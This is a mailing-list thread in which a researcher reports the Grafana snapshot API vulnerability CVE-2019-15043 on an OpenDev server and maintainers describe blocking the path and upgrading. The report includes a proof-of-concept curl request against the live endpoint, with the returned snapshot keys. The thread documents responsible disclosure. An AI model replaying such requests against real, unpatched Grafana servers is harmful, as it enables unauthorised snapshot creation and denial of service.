Critical Vulnerability Report
HEY SECURITY TEAM, I'm Security Researcher I have found a critical vulnerability at one of your domain that is cve-2019-15043 which can led to DDOS attack and can make system go down by grafana snapshot instance Vuln url: https://grafana.opendev.org/api/snapshots <https://grafana.quiknode.io/api/snapshots> POC: root@kali:/home/kali# curl -s XPOST https://grafana.opendev.org/api/snapshots -H "Accept: application/json" -H "Content-Type: application/json" -d '{"dashboard": {}}' | json_pp { "deleteKey" : "6mYFALwQmmpImHeKS30XtFw8ogmoHaSm", "deleteUrl" : " http://localhost:3000/api/snapshots-delete/6mYFALwQmmpImHeKS30XtFw8ogmoHaSm ", "key" : "91H6lcVrwiivMuW1H2iAKcUsZwYU2xfO", "url" : " http://localhost:3000/dashboard/snapshot/91H6lcVrwiivMuW1H2iAKcUsZwYU2xfO" } for more reference - https://aaron-hoffmann.com/blog/cve-2019-15043/ Fix it to latest grafana instance Best Regards, Divya Singh - @Dgirlwhohacks
On Sun, Feb 14, 2021 at 05:47:08PM +0000, Divya Singh wrote:
I have found a critical vulnerability at one of your domain that is cve-2019-15043 which can led to DDOS attack and can make system go down by grafana snapshot instance
Thank you for your report and we will deal with this. For future reference, security issues can be reported via the service-incident@opendev.org address. You certainly could not be expected to know this as we have not done a good job at making this clear. I have proposed [1] to hopefully make this more obvious on the main system-config documentation page. If there was anywhere else you looked for disclosure addresses without success please let us know, and we can work to update that too. -i [1] https://review.opendev.org/c/opendev/system-config/+/775554
Any update on this? Best regards Dgirlwhohacks On Tue, 16 Feb, 2021, 3:00 am Ian Wienand, <iwienand@redhat.com> wrote:
On Mon, Feb 15, 2021 at 03:35:05PM +1100, Ian Wienand wrote:
For future reference, security issues can be reported via the service-incident@opendev.org address.
Sorry, my typo: that should be service-incident@lists.opendev.org (note the lists :)
-i
On 2021-02-28 17:03:13 +0530 (+0530), Divya Singh wrote:
Any update on this? [...]
Thanks for the reminder, subsequent discussion ended up happening in IRC and we neglected to follow up to this mailing list thread. Roughly 22 hours after you contacted this discussion list (some of the delay was waiting on list moderators like me to approve the message), we merged https://review.opendev.org/775548 to block access to any paths starting with "/api/snapshots" after confirming that the latest Grafana release was still vulnerable for sites like ours configured with anonymous access. At the same time, we also reached out to the Grafana maintainers privately via encrypted E-mail to let them know about this alternative avenue to the vulnerability. A couple of days later they pushed and merged https://github.com/grafana/grafana/pull/31263 to correct it, cherry-picking a backport of it to the v7.4.x series in https://github.com/grafana/grafana/pull/31266 and immediately releasing that as v7.4.2. The next day we merged https://review.opendev.org/776553 to upgrade our deployment to the new fixed version, but kept access to /api/snapshots blocked as we treat the service as a read-only interface anyway (configured and managed exclusively through automated orchestration tools driven by code-reviewed Git commits). Thanks again for bringing this to our attention! -- Jeremy Stanley
Hey thanks for the response can I get any kind of token of appreciation for my work if possible? Best, Dgirlwhohacks On Sun, 28 Feb, 2021, 9:16 pm Jeremy Stanley, <fungi@yuggoth.org> wrote:
On 2021-02-28 17:03:13 +0530 (+0530), Divya Singh wrote:
Any update on this? [...]
Thanks for the reminder, subsequent discussion ended up happening in IRC and we neglected to follow up to this mailing list thread.
Roughly 22 hours after you contacted this discussion list (some of the delay was waiting on list moderators like me to approve the message), we merged https://review.opendev.org/775548 to block access to any paths starting with "/api/snapshots" after confirming that the latest Grafana release was still vulnerable for sites like ours configured with anonymous access. At the same time, we also reached out to the Grafana maintainers privately via encrypted E-mail to let them know about this alternative avenue to the vulnerability.
A couple of days later they pushed and merged https://github.com/grafana/grafana/pull/31263 to correct it, cherry-picking a backport of it to the v7.4.x series in https://github.com/grafana/grafana/pull/31266 and immediately releasing that as v7.4.2. The next day we merged https://review.opendev.org/776553 to upgrade our deployment to the new fixed version, but kept access to /api/snapshots blocked as we treat the service as a read-only interface anyway (configured and managed exclusively through automated orchestration tools driven by code-reviewed Git commits).
Thanks again for bringing this to our attention! -- Jeremy Stanley
On 2021-02-28 21:35:24 +0530 (+0530), Divya Singh wrote:
Hey thanks for the response can I get any kind of token of appreciation for my work if possible? [...]
The OpenDev Collaboratory is a volunteer collective operating services on donated resources for the benefit of the broader free/libre open source software community. Aside from publicly thanking you for letting us know about a problem with one of these services (which I've done here on this mailing list), I'm not sure what more we have to offer. -- Jeremy Stanley
Agreed! & Very much appreciated Best, Dgirlwhohacks On Sun, 28 Feb, 2021, 9:55 pm Jeremy Stanley, <fungi@yuggoth.org> wrote:
On 2021-02-28 21:35:24 +0530 (+0530), Divya Singh wrote:
Hey thanks for the response can I get any kind of token of appreciation for my work if possible? [...]
The OpenDev Collaboratory is a volunteer collective operating services on donated resources for the benefit of the broader free/libre open source software community. Aside from publicly thanking you for letting us know about a problem with one of these services (which I've done here on this mailing list), I'm not sure what more we have to offer. -- Jeremy Stanley
participants (3)
-
Divya Singh
-
Ian Wienand
-
Jeremy Stanley